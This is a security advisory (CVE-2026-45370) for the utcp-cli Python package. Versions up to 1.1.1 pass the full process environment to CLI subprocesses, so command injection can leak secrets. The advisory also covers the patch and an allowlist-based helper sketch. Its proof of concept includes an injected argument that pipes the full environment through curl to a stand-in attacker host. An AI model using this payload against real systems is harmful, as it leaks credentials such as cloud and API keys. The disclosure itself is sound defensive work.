GHSA-5v57-8rxj-3p2r

Source
https://github.com/advisories/GHSA-5v57-8rxj-3p2r
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5v57-8rxj-3p2r/GHSA-5v57-8rxj-3p2r.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5v57-8rxj-3p2r
Aliases
  • CVE-2026-45370
Published
2026-05-14T20:56:07Z
Modified
2026-05-16T00:08:47.226722Z
Severity
  • 7.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Summary
python-utcp: Full Process Environment Exposed to CLI Subprocess - Secrets Leakage via Command Injection
Details

Summary

_prepare_environment() in cli_communication_protocol.py passes a full copy of os.environ to every CLI subprocess. When combined with the Command Injection vulnerability (CWE-78) in _substitute_utcp_args() tracked as GHSA-33p6-5jxp-p3x4, an attacker can exfiltrate all process-level secrets in a single tool call.

Vulnerable Code

# cli_communication_protocol.py
def _prepare_environment(self, provider: CliCallTemplate) -> Dict[str, str]:
    env = os.environ.copy()        # All secrets inherited
    if provider.env_vars:
        env.update(provider.env_vars)
    return env

Impact

Any environment variable present in the host process is accessible to injected commands. In typical AI agent deployments this includes:

  • Cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET)
  • Database connection strings (DATABASE_URL)
  • LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY)
  • Internal service tokens

Proof of Concept

# Tool defined as:
{"command": "grep UTCP_ARG_pattern_UTCP_END logfile.txt"}

# Attacker supplies:
tool_args = {"pattern": "x; env | curl -s -d @- https://attacker.com"}

# Executed bash script:
# CMD_0_OUTPUT=$(grep x; env | curl -s -d @- https://attacker.com 2>&1)
# -> Full env dump sent to attacker including all secrets

Patched

Fixed in utcp-cli 1.1.2. _prepare_environment no longer copies the full host environment. Inheritance is controlled by a new CliCallTemplate.inherit_env_vars field:

  • null (default): a small built-in OS-specific allowlist (PATH, HOME, LANG on Unix; PATH, PATHEXT, SYSTEMROOT, USERPROFILE, etc. on Windows) is inherited so shells and binaries continue to work.
  • []: strict mode -- nothing from the host environment reaches the subprocess; only env_vars is propagated.
  • ["FOO", "BAR"]: exactly those host variables are inherited (replaces, not merges with, the default allowlist).

env_vars is always layered on top and overrides any inherited value. Secrets like OPENAI_API_KEY no longer reach the subprocess unless the call template explicitly opts them in.
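
The inheritance rules above, as an added sketch that is not utcp-cli's own code. The function name build_subprocess_env, its host_env and windows parameters, and the sample values are assumptions made for illustration; the default allowlists contain only the names this advisory lists.

```python
import os
import sys
from typing import Dict, Mapping, Optional, Sequence

# Only the names the advisory lists; the shipped defaults include more ("etc.").
DEFAULT_ALLOWLIST_UNIX = ("PATH", "HOME", "LANG")
DEFAULT_ALLOWLIST_WINDOWS = ("PATH", "PATHEXT", "SYSTEMROOT", "USERPROFILE")

# Constructed sample host environment (not real credentials).
SAMPLE_HOST = {
    "PATH": "/usr/bin:/bin",
    "HOME": "/home/agent",
    "LANG": "C.UTF-8",
    "OPENAI_API_KEY": "sk-constructed-example",
    "DATABASE_URL": "postgres://constructed-example/db",
}


def build_subprocess_env(
    inherit_env_vars: Optional[Sequence[str]],
    env_vars: Optional[Mapping[str, str]],
    host_env: Optional[Mapping[str, str]] = None,
    windows: Optional[bool] = None,
) -> Dict[str, str]:
    """Hypothetical helper: build a minimal environment for a CLI subprocess."""
    host = os.environ if host_env is None else host_env
    if windows is None:
        windows = sys.platform.startswith("win")
    if inherit_env_vars is None:
        # null: fall back to the small OS-specific allowlist.
        allowed = DEFAULT_ALLOWLIST_WINDOWS if windows else DEFAULT_ALLOWLIST_UNIX
    else:
        # [] or an explicit list: replaces the default allowlist, never merges.
        allowed = tuple(inherit_env_vars)
    # Start from an empty dict, never from a copy of the host environment.
    env = {name: host[name] for name in allowed if name in host}
    # env_vars is layered last and overrides any inherited value.
    env.update(env_vars or {})
    return env


if __name__ == "__main__":
    for mode in (None, [], ["OPENAI_API_KEY"]):
        env = build_subprocess_env(mode, {"TOOL_MODE": "scan"}, SAMPLE_HOST, windows=False)
        print(repr(mode), "->", sorted(env))
```

Passing the result as env= to subprocess.run or subprocess.Popen means a command running in the child sees only these variables.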

Mitigation

Upgrade to utcp-cli >= 1.1.2. There is no workaround in earlier versions short of stripping secrets from the host process before any CLI tool call.

Credit

Reported by @ZeroXJacks.

Database specific
{
    "github_reviewed_at": "2026-05-14T20:56:07Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-526"
    ],
    "nvd_published_at": "2026-05-14T21:16:48Z",
    "severity": "HIGH"
}
References

Affected packages

PyPI / utcp-cli

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (Unknown introduced version / All previous versions are affected)
Fixed
1.1.2

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.1.0
1.1.1

Database specific

last_known_affected_version_range
"<= 1.1.1"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5v57-8rxj-3p2r/GHSA-5v57-8rxj-3p2r.json"